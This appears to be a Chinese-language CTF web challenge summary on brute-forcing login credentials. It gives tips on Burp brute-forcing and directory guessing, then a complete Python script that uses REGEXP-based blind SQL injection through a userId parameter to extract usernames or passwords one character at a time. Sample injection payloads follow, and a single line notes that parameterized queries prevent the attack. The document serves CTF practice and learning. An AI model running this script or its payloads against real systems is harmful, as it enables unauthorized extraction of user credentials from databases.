CTF web题总结--爆破用户名密码

xiaoxiao2021-02-28  103

1、用 burp 爆破用户名密码
2、参数名 id、userid、userId 等多试几次
3、爆破后台目录,如 index.php、users.php、login.php、flag.php
4、脚本:

# -*- coding:utf-8 -*- import httplib import re import urllib class Attacker: def __init__(self, mode, url): self.url = url self.domin = self.get_domin() self.mode = mode str1 = [] for i in range(26): str1.append(chr(ord('a') + i)) for i in range(26): str1.append(chr(ord('A') + i)) for i in range(10): str1.append(chr(ord('0') + i)) self.str_box = str1 def get_domin(self): url = self.url url_a = url.split('://') if re.match('^http',url_a[0]): url = url_a[1] else: url = url_a[0] url_a = url.split('/') domin = url_a[0] return domin def crack(self): conn = httplib.HTTPConnection(self.domin) if self.mode == 1: aim = 'username' if self.mode == 2: aim = 'password' url = self.url attack_url1 = urllib.quote('\' or ' + aim + ' regexp \'') attack_url2 = urllib.quote('\' #') str_box = self.str_box try: string = '^' while True: for str_end in str_box: url_to_attack = url + attack_url1 + string + str_end + attack_url2 #print url_to_attack conn.request(method="GET", url=url_to_attack) response = conn.getresponse() res = response.read() if res.find('useless') > 0: string = string + str_end str_end = -1 print string[1:] #如果想看到破进程,取消此段注释 break if str_end != -1 and str_end == '9': break self.name = string print self.name[1:] except: print "Something Wrong" print url def main(): attack_url = 'http://10.200.91.28/zebCTF/users.php?userId=2' attacker = Attacker(2, attack_url) #1为用户名注入,2为密码注入 attacker.crack() if __name__ == '__main__': main()

正则注入

userId=2' or username REGEXP '^A' #
userId=2' or username REGEXP '^a' #
userId=2' or username REGEXP '^Z' #

说明:每个请求只改变 '^' 后面的一个字符,页面响应的差异反映 REGEXP 条件的真假,脚本据此逐位确认字段内容。服务端对 userId 使用参数化查询(预编译语句)即可消除该注入点。
